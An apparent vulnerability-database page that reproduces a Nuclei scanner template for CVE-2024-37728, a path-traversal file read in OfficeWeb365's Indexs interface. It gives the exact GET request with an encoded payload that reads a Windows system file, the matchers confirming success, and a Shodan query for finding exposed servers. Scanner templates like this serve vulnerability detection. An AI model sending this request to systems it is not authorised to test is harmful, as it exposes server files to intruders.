CVE-2024-37728: OfficeWeb365 Indexs Interface - Arbitrary File Read

日期: 2025-08-01 | 影响软件: OfficeWeb365 | POC: 已公开

漏洞描述

There is any file reading in the officeWeb365 Indexs interface.

PoC代码[已公开]

id: CVE-2024-37728

info:
  name: OfficeWeb365 Indexs Interface - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    There is any file reading in the officeWeb365 Indexs interface.
  reference:
    - https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37728
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-37728
    epss-score: 0.10823
    epss-percentile: 0.93043
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: "OfficeWeb365"
  tags: cve,cve2024,officeweb365,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "for 16-bit app support"

      - type: word
        part: body
        words:
          - "image/png"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100da222c760e0730d69679df145a9c0d69a50ad3502822083b4d57be2247ee01ce0220587f2d34971c6ec3d3c4c91cfd85f6f236b6c227aa6800c654f9d62a417b114a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-37728.yaml

相关漏洞推荐